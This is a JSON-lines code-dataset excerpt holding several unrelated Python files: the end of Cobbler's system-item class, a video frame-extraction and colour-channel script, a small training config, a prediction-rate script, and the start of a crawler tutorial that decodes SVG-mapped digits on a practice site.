True, \"Serial Baud Rate\", [\"\", \"2400\", \"4800\", \"9600\", \"19200\", \"38400\", \"57600\", \"115200\"], \"int\"],\n]\n\n# network interface fields are in a separate list because a system may contain\n# several network interfaces and thus several values for each one of those fields\n# (1-N cardinality), while it may contain only one value for other fields\n# (1-1 cardinality). This difference requires special handling.\nNETWORK_INTERFACE_FIELDS = [\n [\"bonding_opts\", \"\", 0, \"Bonding Opts\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"bridge_opts\", \"\", 0, \"Bridge Opts\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"cnames\", [], 0, \"CNAMES\", True, \"Cannonical Name Records, should be used with --interface, In quotes, space delimited\", 0, \"list\"],\n [\"connected_mode\", False, 0, \"InfiniBand Connected Mode\", True, \"Should be used with --interface\", 0, \"bool\"],\n [\"dhcp_tag\", \"\", 0, \"DHCP Tag\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"dns_name\", \"\", 0, \"DNS Name\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"if_gateway\", \"\", 0, \"Per-Interface Gateway\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"interface_master\", \"\", 0, \"Master Interface\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"interface_type\", \"na\", 0, \"Interface Type\", True, \"Should be used with --interface\", [\"na\", \"bond\", \"bond_slave\", \"bridge\", \"bridge_slave\", \"bonded_bridge_slave\", \"bmc\", \"infiniband\"], \"str\"],\n [\"ip_address\", \"\", 0, \"IP Address\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_address\", \"\", 0, \"IPv6 Address\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_default_gateway\", \"\", 0, \"IPv6 Default Gateway\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_mtu\", \"\", 0, \"IPv6 MTU\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_prefix\", \"\", 0, \"IPv6 Prefix\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_secondaries\", [], 0, \"IPv6 Secondaries\", True, \"Space delimited. Should be used with --interface\", 0, \"list\"],\n [\"ipv6_static_routes\", [], 0, \"IPv6 Static Routes\", True, \"Should be used with --interface\", 0, \"list\"],\n [\"mac_address\", \"\", 0, \"MAC Address\", True, \"(Place \\\"random\\\" in this field for a random MAC Address.)\", 0, \"str\"],\n [\"management\", False, 0, \"Management Interface\", True, \"Is this the management interface? Should be used with --interface\", 0, \"bool\"],\n [\"mtu\", \"\", 0, \"MTU\", True, \"\", 0, \"str\"],\n [\"netmask\", \"\", 0, \"Subnet Mask\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"static\", False, 0, \"Static\", True, \"Is this interface static? Should be used with --interface\", 0, \"bool\"],\n [\"static_routes\", [], 0, \"Static Routes\", True, \"Should be used with --interface\", 0, \"list\"],\n [\"virt_bridge\", \"\", 0, \"Virt Bridge\", True, \"Should be used with --interface\", 0, \"str\"],\n]\n\n\nclass System(item.Item):\n \"\"\"\n A Cobbler system object.\n \"\"\"\n\n TYPE_NAME = _(\"system\")\n COLLECTION_TYPE = \"system\"\n\n def __init__(self, *args, **kwargs):\n super(System, self).__init__(*args, **kwargs)\n self.interfaces = dict()\n self.kernel_options = {}\n self.kernel_options_post = {}\n self.autoinstall_meta = {}\n self.fetchable_files = {}\n self.boot_files = {}\n self.template_files = {}\n\n #\n # override some base class methods first (item.Item)\n #\n\n def get_fields(self):\n return FIELDS\n\n def make_clone(self):\n _dict = self.to_dict()\n cloned = System(self.collection_mgr)\n cloned.from_dict(_dict)\n return cloned\n\n def from_dict(self, seed_data):\n # FIXME: most definitely doesn't grok interfaces yet.\n return utils.from_dict_from_fields(self, seed_data, FIELDS)\n\n def get_parent(self):\n \"\"\"\n Return object next highest up the tree.\n \"\"\"\n if (self.parent is None or self.parent == '') and self.profile:\n return self.collection_mgr.profiles().find(name=self.profile)\n elif (self.parent is None or self.parent == '') and self.image:\n return self.collection_mgr.images().find(name=self.image)\n else:\n return self.collection_mgr.systems().find(name=self.parent)\n\n def check_if_valid(self):\n if self.name is None or self.name == \"\":\n raise CX(\"name is required\")\n if self.profile is None or self.profile == \"\":\n if self.image is None or self.image == \"\":\n raise CX(\"Error with system %s - profile or image is required\" % (self.name))\n\n #\n # specific methods for item.System\n #\n\n def __create_interface(self, interface):\n\n self.interfaces[interface] = {}\n for field in NETWORK_INTERFACE_FIELDS:\n self.interfaces[interface][field[0]] = field[1]\n\n def __get_interface(self, name):\n\n if not name:\n raise CX(_(\"No network interface name provided\"))\n if name not in self.interfaces:\n self.__create_interface(name)\n\n return self.interfaces[name]\n\n def delete_interface(self, name):\n \"\"\"\n Used to remove an interface.\n \"\"\"\n if name in self.interfaces and len(self.interfaces) > 1:\n del self.interfaces[name]\n else:\n if name not in self.interfaces:\n # no interface here to delete\n pass\n else:\n raise CX(_(\"At least one interface needs to be defined.\"))\n\n def rename_interface(self, names):\n \"\"\"\n Used to rename an interface.\n \"\"\"\n (name, newname) = names\n if name not in self.interfaces:\n raise CX(_(\"Interface %s does not exist\" % name))\n if newname in self.interfaces:\n raise CX(_(\"Interface %s already exists\" % newname))\n else:\n self.interfaces[newname] = self.interfaces[name]\n del self.interfaces[name]\n\n def set_boot_loader(self, name):\n if name not in utils.get_supported_system_boot_loaders():\n raise CX(_(\"Invalid boot loader name: %s\" % name))\n self.boot_loader = name\n\n def set_server(self, server):\n \"\"\"\n If a system can't reach the boot server at the value configured in settings\n because it doesn't have the same name on it's subnet this is there for an override.\n \"\"\"\n if server is None or server == \"\":\n server = \"<>\"\n self.server = server\n\n def set_next_server(self, server):\n if server is None or server == \"\" or server == \"<>\":\n self.next_server = \"<>\"\n else:\n server = server.strip()\n self.next_server = validate.ipv4_address(server)\n\n def set_proxy(self, proxy):\n if proxy is None or proxy == \"\":\n proxy = \"<>\"\n self.proxy = proxy\n\n def get_mac_address(self, interface):\n \"\"\"\n Get the mac address, which may be implicit in the object name or explicit with --mac-address.\n Use the explicit location first.\n \"\"\"\n\n intf = self.__get_interface(interface)\n\n if intf[\"mac_address\"] != \"\":\n return intf[\"mac_address\"].strip()\n else:\n return None\n\n def get_ip_address(self, interface):\n \"\"\"\n Get the IP address for the given interface.\n \"\"\"\n intf = self.__get_interface(interface)\n if intf[\"ip_address\"] != \"\":\n return intf[\"ip_address\"].strip()\n else:\n return \"\"\n\n def is_management_supported(self, cidr_ok=True):\n \"\"\"\n Can only add system PXE records if a MAC or IP address is available, else it's a koan\n only record.\n \"\"\"\n if self.name == \"default\":\n return True\n for (name, x) in self.interfaces.iteritems():\n mac = x.get(\"mac_address\", None)\n ip = x.get(\"ip_address\", None)\n if ip is not None and not cidr_ok and ip.find(\"/\") != -1:\n # ip is in CIDR notation\n return False\n if mac is not None or ip is not None:\n # has ip and/or mac\n return True\n return False\n\n def set_dhcp_tag(self, dhcp_tag, interface):\n intf = self.__get_interface(interface)\n intf[\"dhcp_tag\"] = dhcp_tag\n\n def set_cnames(self, cnames, interface):\n intf = self.__get_interface(interface)\n data = utils.input_string_or_list(cnames)\n intf[\"cnames\"] = data\n\n def set_static_routes(self, routes, interface):\n intf = self.__get_interface(interface)\n data = utils.input_string_or_list(routes)\n intf[\"static_routes\"] = data\n\n def set_status(self, status):\n self.status = status\n\n def set_static(self, truthiness, interface):\n intf = self.__get_interface(interface)\n intf[\"static\"] = utils.input_boolean(truthiness)\n\n def set_management(self, truthiness, interface):\n intf = self.__get_interface(interface)\n intf[\"management\"] = utils.input_boolean(truthiness)\n\n# ---\n\n def set_dns_name(self, dns_name, interface):\n \"\"\"\n Set DNS name for interface.\n\n @param: str dns_name (dns name)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n dns_name = validate.hostname(dns_name)\n if dns_name != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_hostnames) is False:\n matched = self.collection_mgr.api.find_items(\"system\", {\"dns_name\": dns_name})\n for x in matched:\n if x.name != self.name:\n raise CX(\"DNS name duplicated: %s\" % dns_name)\n\n intf = self.__get_interface(interface)\n intf[\"dns_name\"] = dns_name\n\n def set_hostname(self, hostname):\n \"\"\"\n Set hostname.\n\n @param: str hostname (hostname for system)\n @returns: True or CX\n \"\"\"\n self.hostname = validate.hostname(hostname)\n\n def set_ip_address(self, address, interface):\n \"\"\"\n Set IPv4 address on interface.\n\n @param: str address (ip address)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n address = validate.ipv4_address(address)\n if address != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_ips) is False:\n matched = self.collection_mgr.api.find_items(\"system\", {\"ip_address\": address})\n for x in matched:\n if x.name != self.name:\n raise CX(\"IP address duplicated: %s\" % address)\n\n intf = self.__get_interface(interface)\n intf[\"ip_address\"] = address\n\n def set_mac_address(self, address, interface):\n \"\"\"\n Set mac address on interface.\n\n @param: str address (mac address)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n address = validate.mac_address(address)\n if address == \"random\":\n address = utils.get_random_mac(self.collection_mgr.api)\n if address != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_macs) is False:\n matched = self.collection_mgr.api.find_items(\"system\", {\"mac_address\": address})\n for x in matched:\n if x.name != self.name:\n raise CX(\"MAC address duplicated: %s\" % address)\n\n intf = self.__get_interface(interface)\n intf[\"mac_address\"] = address\n\n def set_gateway(self, gateway):\n \"\"\"\n Set a gateway IPv4 address.\n\n @param: str gateway (ip address)\n @returns: True or CX\n \"\"\"\n self.gateway = validate.ipv4_address(gateway)\n\n def set_name_servers(self, data):\n \"\"\"\n Set the DNS servers.\n\n @param: str/list data (string or list of nameservers)\n @returns: True or CX\n \"\"\"\n self.name_servers = validate.name_servers(data)\n\n def set_name_servers_search(self, data):\n \"\"\"\n Set the DNS search paths.\n\n @param: str/list data (string or list of search domains)\n @returns: True or CX\n \"\"\"\n self.name_servers_search = validate.name_servers_search(data)\n\n def set_netmask(self, netmask, interface):\n \"\"\"\n Set the netmask for given interface.\n\n @param: str netmask (netmask)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n intf = self.__get_interface(interface)\n intf[\"netmask\"] = validate.ipv4_netmask(netmask)\n\n def set_if_gateway(self, gateway, interface):\n \"\"\"\n Set the per-interface gateway.\n\n @param: str gateway (ipv4 address for the gateway)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n intf = self.__get_interface(interface)\n intf[\"if_gateway\"] = validate.ipv4_address(gateway)\n\n# --\n\n def set_virt_bridge(self, bridge, interface):\n if bridge == \"\":\n bridge = self.settings.default_virt_bridge\n intf = self.__get_interface(interface)\n intf[\"virt_bridge\"] = bridge\n\n def set_interface_type(self, type, interface):\n interface_types = [\"bridge\", \"bridge_slave\", \"bond\", \"bond_slave\", \"bonded_bridge_slave\", \"bmc\", \"na\", \"infiniband\", \"\"]\n if type not in interface_types:\n raise CX(_(\"interface type value must be one of: %s or blank\" % \",\".join(interface_types)))\n if type == \"na\":\n type = \"\"\n intf = self.__get_interface(interface)\n intf[\"interface_type\"] = type\n\n def set_interface_master(self, interface_master, interface):\n intf = self.__get_interface(interface)\n intf[\"interface_master\"] = interface_master\n\n def set_bonding_opts(self, bonding_opts, interface):\n intf = self.__get_interface(interface)\n intf[\"bonding_opts\"] = bonding_opts\n\n def set_bridge_opts(self, bridge_opts, interface):\n intf = self.__get_interface(interface)\n intf[\"bridge_opts\"] = bridge_opts\n\n def set_ipv6_autoconfiguration(self, truthiness):\n self.ipv6_autoconfiguration = utils.input_boolean(truthiness)\n\n def set_ipv6_default_device(self, interface_name):\n if interface_name is None:\n interface_name = \"\"\n self.ipv6_default_device = interface_name\n\n def set_ipv6_address(self, address, interface):\n \"\"\"\n Set IPv6 address on interface.\n\n @param: str address (ip address)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n address = validate.ipv6_address(address)\n if address != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_ips) is False:\n matched = self.collection_mgr.api.find_items(\"system\", {\"ipv6_address\": address})\n for x in matched:\n if x.name != self.name:\n raise CX(\"IP address duplicated: %s\" % address)\n\n intf = self.__get_interface(interface)\n intf[\"ipv6_address\"] = address\n\n def set_ipv6_prefix(self, prefix, interface):\n \"\"\"\n Assign a IPv6 prefix\n \"\"\"\n intf = self.__get_interface(interface)\n intf[\"ipv6_prefix\"] = prefix.strip()\n\n def set_ipv6_secondaries(self, addresses, interface):\n intf = self.__get_interface(interface)\n data = utils.input_string_or_list(addresses)\n secondaries = []\n for address in data:\n if address == \"\" or utils.is_ip(address):\n secondaries.append(address)\n else:\n raise CX(_(\"invalid format for IPv6 IP address (%s)\") % address)\n\n intf[\"ipv6_secondaries\"] = secondaries\n\n def set_ipv6_default_gateway(self, address, interface):\n intf = self.__get_interface(interface)\n if address == \"\" or utils.is_ip(address):\n intf[\"ipv6_default_gateway\"] = address.strip()\n return\n raise CX(_(\"invalid format for IPv6 IP address (%s)\") % address)\n\n def set_ipv6_static_routes(self, routes, interface):\n intf = self.__get_interface(interface)\n data = utils.input_string_or_list(routes)\n intf[\"ipv6_static_routes\"] = data\n\n def set_ipv6_mtu(self, mtu, interface):\n intf = self.__get_interface(interface)\n intf[\"ipv6_mtu\"] = mtu\n\n def set_mtu(self, mtu, interface):\n intf = self.__get_interface(interface)\n intf[\"mtu\"] = mtu\n\n def set_connected_mode(self, truthiness, interface):\n intf = self.__get_interface(interface)\n intf[\"connected_mode\"] = utils.input_boolean(truthiness)\n\n def set_enable_gpxe(self, enable_gpxe):\n \"\"\"\n Sets whether or not the system will use gPXE for booting.\n \"\"\"\n self.enable_gpxe = utils.input_boolean(enable_gpxe)\n\n def set_profile(self, profile_name):\n \"\"\"\n Set the system to use a certain named profile. The profile\n must have already been loaded into the Profiles collection.\n \"\"\"\n old_parent = self.get_parent()\n if profile_name in [\"delete\", \"None\", \"~\", \"\"] or profile_name is None:\n self.profile = \"\"\n if isinstance(old_parent, item.Item):\n old_parent.children.pop(self.name, 'pass')\n return\n\n self.image = \"\" # mutual exclusion rule\n\n p = self.collection_mgr.profiles().find(name=profile_name)\n if p is not None:\n self.profile = profile_name\n self.depth = p.depth + 1 # subprofiles have varying depths.\n if isinstance(old_parent, item.Item):\n old_parent.children.pop(self.name, 'pass')\n new_parent = self.get_parent()\n if isinstance(new_parent, item.Item):\n new_parent.children[self.name] = self\n return\n raise CX(_(\"invalid profile name: %s\") % profile_name)\n\n def set_image(self, image_name):\n \"\"\"\n Set the system to use a certain named image. Works like set_profile\n but cannot be used at the same time. It's one or the other.\n \"\"\"\n old_parent = self.get_parent()\n if image_name in [\"delete\", \"None\", \"~\", \"\"] or image_name is None:\n self.image = \"\"\n if isinstance(old_parent, item.Item):\n old_parent.children.pop(self.name, 'pass')\n return\n\n self.profile = \"\" # mutual exclusion rule\n\n img = self.collection_mgr.images().find(name=image_name)\n\n if img is not None:\n self.image = image_name\n self.depth = img.depth + 1\n if isinstance(old_parent, item.Item):\n old_parent.children.pop(self.name, 'pass')\n new_parent = self.get_parent()\n if isinstance(new_parent, item.Item):\n new_parent.children[self.name] = self\n return\n raise CX(_(\"invalid image name (%s)\") % image_name)\n\n def set_virt_cpus(self, num):\n return utils.set_virt_cpus(self, num)\n\n def set_virt_file_size(self, num):\n return utils.set_virt_file_size(self, num)\n\n def set_virt_disk_driver(self, driver):\n return utils.set_virt_disk_driver(self, driver)\n\n def set_virt_auto_boot(self, num):\n return utils.set_virt_auto_boot(self, num)\n\n def set_virt_pxe_boot(self, num):\n return utils.set_virt_pxe_boot(self, num)\n\n def set_virt_ram(self, num):\n return utils.set_virt_ram(self, num)\n\n def set_virt_type(self, vtype):\n return utils.set_virt_type(self, vtype)\n\n def set_virt_path(self, path):\n return utils.set_virt_path(self, path, for_system=True)\n\n def set_netboot_enabled(self, netboot_enabled):\n \"\"\"\n If true, allows per-system PXE files to be generated on sync (or add). If false,\n these files are not generated, thus eliminating the potential for an infinite install\n loop when systems are set to PXE boot first in the boot order. In general, users\n who are PXE booting first in the boot order won't create system definitions, so this\n feature primarily comes into play for programmatic users of the API, who want to\n initially create a system with netboot enabled and then disable it after the system installs,\n as triggered by some action in automatic installation file's %post section.\n For this reason, this option is not urfaced in the CLI, output, or documentation (yet).\n\n Use of this option does not affect the ability to use PXE menus. If an admin has machines\n set up to PXE only after local boot fails, this option isn't even relevant.\n \"\"\"\n self.netboot_enabled = utils.input_boolean(netboot_enabled)\n\n def set_autoinstall(self, autoinstall):\n \"\"\"\n Set the automatic installation template filepath, this must be a local file.\n\n @param str local automatic installation template file path\n \"\"\"\n\n autoinstall_mgr = autoinstall_manager.AutoInstallationManager(self.collection_mgr)\n self.autoinstall = autoinstall_mgr.validate_autoinstall_template_file_path(autoinstall)\n\n def set_power_type(self, power_type):\n if power_type is None:\n power_type = \"\"\n power_manager.validate_power_type(power_type)\n self.power_type = power_type\n\n def set_power_user(self, power_user):\n if power_user is None:\n power_user = \"\"\n utils.safe_filter(power_user)\n self.power_user = power_user\n\n def set_power_pass(self, power_pass):\n if power_pass is None:\n power_pass = \"\"\n utils.safe_filter(power_pass)\n self.power_pass = power_pass\n\n def set_power_address(self, power_address):\n if power_address is None:\n power_address = \"\"\n utils.safe_filter(power_address)\n self.power_address = power_address\n\n def set_power_id(self, power_id):\n if power_id is None:\n power_id = \"\"\n utils.safe_filter(power_id)\n self.power_id = power_id\n\n def modify_interface(self, _dict):\n \"\"\"\n Used by the WUI to modify an interface more-efficiently\n \"\"\"\n\n for (key, value) in _dict.iteritems():\n (field, interface) = key.split(\"-\", 1)\n field = field.replace(\"_\", \"\").replace(\"-\", \"\")\n\n if field == \"bondingopts\":\n self.set_bonding_opts(value, interface)\n\n if field == \"bridgeopts\":\n self.set_bridge_opts(value, interface)\n\n if field == \"connected_mode\":\n self.set_connected_mode(value, interface)\n\n if field == \"cnames\":\n self.set_cnames(value, interface)\n\n if field == \"dhcptag\":\n self.set_dhcp_tag(value, interface)\n\n if field == \"dnsname\":\n self.set_dns_name(value, interface)\n\n if field == \"ifgateway\":\n self.set_if_gateway(value, interface)\n\n if field == \"interfacetype\":\n self.set_interface_type(value, interface)\n\n if field == \"interfacemaster\":\n self.set_interface_master(value, interface)\n\n if field == \"ipaddress\":\n self.set_ip_address(value, interface)\n\n if field == \"ipv6address\":\n self.set_ipv6_address(value, interface)\n\n if field == \"ipv6defaultgateway\":\n self.set_ipv6_default_gateway(value, interface)\n\n if field == \"ipv6mtu\":\n self.set_ipv6_mtu(value, interface)\n\n if field == \"ipv6prefix\":\n self.set_ipv6_prefix(value, interface)\n\n if field == \"ipv6secondaries\":\n self.set_ipv6_secondaries(value, interface)\n\n if field == \"ipv6staticroutes\":\n self.set_ipv6_static_routes(value, interface)\n\n if field == \"macaddress\":\n self.set_mac_address(value, interface)\n\n if field == \"management\":\n self.set_management(value, interface)\n\n if field == \"mtu\":\n self.set_mtu(value, interface)\n\n if field == \"netmask\":\n self.set_netmask(value, interface)\n\n if field == \"static\":\n self.set_static(value, interface)\n\n if field == \"staticroutes\":\n self.set_static_routes(value, interface)\n\n if field == \"virtbridge\":\n self.set_virt_bridge(value, interface)\n\n def set_repos_enabled(self, repos_enabled):\n self.repos_enabled = utils.input_boolean(repos_enabled)\n\n def set_serial_device(self, device_number):\n return utils.set_serial_device(self, device_number)\n\n def set_serial_baud_rate(self, baud_rate):\n return utils.set_serial_baud_rate(self, baud_rate)\n\n# EOF\n","repo_name":"shenson/cobbler","sub_path":"cobbler/item_system.py","file_name":"item_system.py","file_ext":"py","file_size_in_byte":29877,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"7609063694","text":"# %%\r\n'''----------------------------------------------------------------\r\nVideo formatt is .avi Primarily use OpenCV to process data\r\nAll imports data initialized paths goes here\r\nFunction 1. Read and Extract all the frames from videos for downstream\r\n cell segmentation\r\n----------------------------------------------------------------'''\r\nimport cv2\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nCapture Video and get each frames then save them into .png format\r\nEach Video will be in a different folder\r\n----------------------------------------------------------------'''\r\ndef CaptureVideo(video_path):\r\n video_name = os.path.split(video_path)[1]\r\n print (f'----- {video_name} -----')\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n frame_folder = './' + 'original_' + video_name\r\n if not os.path.exists(frame_folder):\r\n os.mkdir(frame_folder)\r\n\r\n cap = cv2.VideoCapture(video_path)\r\n total_frame = cap.get(7)\r\n print (f'----- Total Number of Frames [{cap.get(7)}] -----')\r\n\r\n Index = 1\r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n\r\n if ret:\r\n print (f'----- Frame # {Index} -----')\r\n frame = Crop_Pic(frame)\r\n ExtractColor(img = frame, video_name = video_name, index = Index)\r\n img_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.title('Frame ' + str(Index))\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n plt.imsave(frame_folder + '/Frame_' + str(Index) + '.png', img_rgb, format = 'png')\r\n plt.close()\r\n \r\n Index = Index + 1\r\n if Index > total_frame:\r\n break\r\n\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nCrop the image to exclude the 50um and timelines\r\nAssume it is a squre and it locates at the centre of the pics\r\n----------------------------------------------------------------'''\r\ndef Crop_Pic(img):\r\n shape = img.shape\r\n height, width = shape[0], shape[1]\r\n left_edge = int(width / 2 - height / 2)\r\n right_edge = int(width / 2 + height / 2)\r\n img = img[0:height, left_edge:right_edge]\r\n return img\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nExtrace Red and Yellow Color Channel\r\n----------------------------------------------------------------'''\r\ndef ExtractColor(img, video_name, index):\r\n '''\r\n For yellow part, set red and blue channel to 0, therefore convert them to green channel only\r\n For red part, set blue channel to 0\r\n For the rest of the place, substract Red - Green to get pure red\r\n Two types of cells combined. Then substract Red - Green again to acquire pure B cells\r\n Then adjust the negative or noise values\r\n '''\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n frame_folder = './' + 'extract_' + video_name\r\n if not os.path.exists(frame_folder):\r\n os.mkdir(frame_folder)\r\n\r\n yellow = img.copy()\r\n yellow[:, :, 0] = 0 # blue\r\n yellow[:, :, 2] = 0 # red\r\n SaveImg(yellow, 'Yellow', frame_folder, index)\r\n\r\n blur = yellow.copy()\r\n blur = cv2.pyrMeanShiftFiltering(blur, 25, 5)\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n SaveImg(blur, 'YellowBlur', frame_folder, index)\r\n\r\n red = img.copy()\r\n red[:, :, 0] = 0 # blue\r\n red[:, :, 1] = 0 # green\r\n\r\n for i in range(np.shape(red)[0]):\r\n for j in range(np.shape(red)[1]):\r\n if red[i, j, 2] < yellow[i, j ,1]:\r\n red[i, j, 2] = 0\r\n else:\r\n red[i, j, 2] = red[i, j, 2] - yellow[i, j, 1]\r\n\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n SaveImg(red, 'Red', frame_folder, index)\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nSave individual image to Red and Yellow folder respectively\r\n----------------------------------------------------------------'''\r\ndef SaveImg(img, color, frame_folder, index):\r\n img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\n if not os.path.exists(frame_folder + '/' + color):\r\n os.mkdir(frame_folder + '/' + color)\r\n os.chdir(frame_folder + '/' + color)\r\n\r\n for contrast in ['Colour', 'Grey']:\r\n if not os.path.exists('./' + contrast):\r\n os.mkdir('./' + contrast)\r\n if contrast == 'Colour':\r\n plt.imsave('./' + contrast + '/Frame_' + str(index).zfill(3) + '.png', img, format = 'png')\r\n if contrast == 'Grey':\r\n cv2.imwrite('./' + contrast + '/GreyFrame_' + str(index).zfill(3) + '.png', img_grey)\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nGet all the videos paths from objective_directory\r\n----------------------------------------------------------------'''\r\ndef Get_Video_Path(objective_directory):\r\n all_files = []\r\n for lists in os.listdir(objective_directory):\r\n if lists.endswith('.avi'):\r\n all_files.append(os.path.join(objective_directory, lists))\r\n return all_files\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nMain part of the module goes here\r\n----------------------------------------------------------------'''\r\nif __name__ == '__main__':\r\n # A series of videos go here.\r\n objective_directory = 'D:\\Rotation2\\IVM-MRes project #2\\Video data (back-up)'\r\n all_files = Get_Video_Path(objective_directory)\r\n for files in all_files:\r\n CaptureVideo(files)\r\n \r\n # A solely video goes here.\r\n CaptureVideo('D:\\Rotation2\\VideoFrame\\Exp 18-5-18 FTY720\\FTY720 spleen 1h both cells after.avi')","repo_name":"michaelgmz/MRes-2020DS-Project2","sub_path":"PyCodes/LoadVideo.py","file_name":"LoadVideo.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27138770424","text":"training_param = {\n 'init_scale': 0.1,\n 'learning_rate': 1.0,\n 'learning_rate_decay': 0.5,\n 'decay_after': 10,\n 'num_epochs': 20,\n 'batch_size': 20,\n 'keep_prob': 0.82,\n 'max_grad_norm': 5,\n 'num_layers': 1,\n 'num_steps': 38,\n 'hidden_size': 270,\n}\n\nmodel_path = './model'\nwords_path = './data/vocabulary.pkl'\nword_to_id_path = './data/vocabulary_to_id.pkl'\ntraining_data_path = './data/training_data.pkl'\n","repo_name":"vinachang/chung_generator","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41596820947","text":"from typing import Dict\r\n\"\"\"\r\nCalculate rate of prediction from predicted triples.\r\nThe rate is used as a feature in the classification model.\r\n\"\"\"\r\nf = open('predicted_triples.csv')\r\nlines = f.readlines()\r\nf.close()\r\n\r\ncount_heads: Dict = {}\r\ncount_tails: Dict = {}\r\nentity_map: Dict = {}\r\n\r\n# line format: id, head_name, relation_name, tail_name, score, rank, head, tail\r\nfor line in lines:\r\n tokens = line.strip().split(',')\r\n head_name = tokens[1]\r\n tail_name = tokens[3]\r\n head = tokens[6]\r\n tail = tokens[7]\r\n if head not in entity_map:\r\n entity_map[head] = head_name\r\n if tail not in entity_map:\r\n entity_map[tail] = tail_name\r\n if head not in count_heads:\r\n count_heads[head] = 0\r\n if head not in count_tails:\r\n count_tails[head] = 0\r\n if tail not in count_heads:\r\n count_heads[tail] = 0\r\n if tail not in count_tails:\r\n count_tails[tail] = 0\r\n count_heads[head] += 1\r\n count_tails[tail] += 1\r\n\r\nsum_count = len(lines)\r\n\r\nout_heads = open('predicted_heads_rate.csv', 'w')\r\nout_tails = open('predicted_tails_rate.csv', 'w')\r\n\r\nfor key in count_heads.keys():\r\n out_heads.write(entity_map[key] + ',' + key + ',' + str(count_heads[key] / sum_count) + '\\n')\r\n out_tails.write(entity_map[key] + ',' + key + ',' + str(count_tails[key] / sum_count) + '\\n')\r\n\r\nout_heads.close() \r\nout_tails.close()","repo_name":"HYU2023-ClassFinder/prediction-triple-classifier","sub_path":"get_prediction_rate.py","file_name":"get_prediction_rate.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71551299280","text":"# -*- coding: utf-8 -*-\n\n'''\n@Author : Corley Tang\n@contact : cutercorleytd@gmail.com\n@Github : https://github.com/corleytd\n@Time : 2023-12-16 10:06\n@Project : Hands-on Crawler with Python-anti_crawler_with_svg_mapping\nSVG映射反爬\nhttp://42.194.197.95:8001/svg\n'''\n\n# 导入所需的库\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\ncookies = {\n 'session': '.eJyrViotTi1SsqpWyiyOT0zJzcxTsjLQUcrJTwexSopKU3WUcvOTMnNSlayUDM3gQEkHrDE-M0XJyhjCzkvMBSmKKTU3NbKIKTUzMjZXqq0FAN1MHbY.ZXcBDQ.EQ1PisBh-GQTUOfEjYBwWL3dRXw'\n}\n\nurl = 'http://42.194.197.95:8001/svg'\nsvg_url = 'http://42.194.197.95:8001/static/number.svg'\ncss_url = 'http://42.194.197.95:8001/static/css/phone_svg.css'\nfont_size_pattern = re.compile(r'font-size:(\\d+)px')\n\n# 获取SVG内容与CSS样式内容\nsvg_content = requests.get(svg_url, cookies=cookies).text\ncss_content = requests.get(css_url, cookies=cookies).text\n\n\ndef get_location_from_css(css_content, class_name):\n '''\n 从CSS中获取某个class对应的位置\n :param css_content: CSS原始代码\n :param class_name: class属性值\n :return: 当前class属性值对应的横纵坐标\n '''\n css_content = css_content.replace('\\n', '').replace(' ', '') # 去除CSS中的换行符和空格\n locations = re.findall('.%s{background:-(\\d+)px-(\\d+)px;}' % class_name, css_content)\n return int(locations[0][0]), int(locations[0][1])\n\n\ndef get_font_size_y_text_from_svg(svg_content):\n '''\n 从SVG中获取字体大小、所有行的y轴坐标和文本\n :param svg_content: SVG原始代码\n :return: 字体大小、y轴坐标、文本\n '''\n sizes = font_size_pattern.findall(svg_content)\n font_size = int(sizes[0]) if sizes else 16 # SVG中默认字体大小为16\n\n dom = BeautifulSoup(svg_content, 'xml') # 解析SVG\n text_tags = dom.find_all('text') # 获取所有text标签\n y_locations = [int(tag.attrs['y']) for tag in text_tags]\n texts = [tag.text for tag in text_tags]\n\n return font_size, y_locations, texts\n\n\ndef 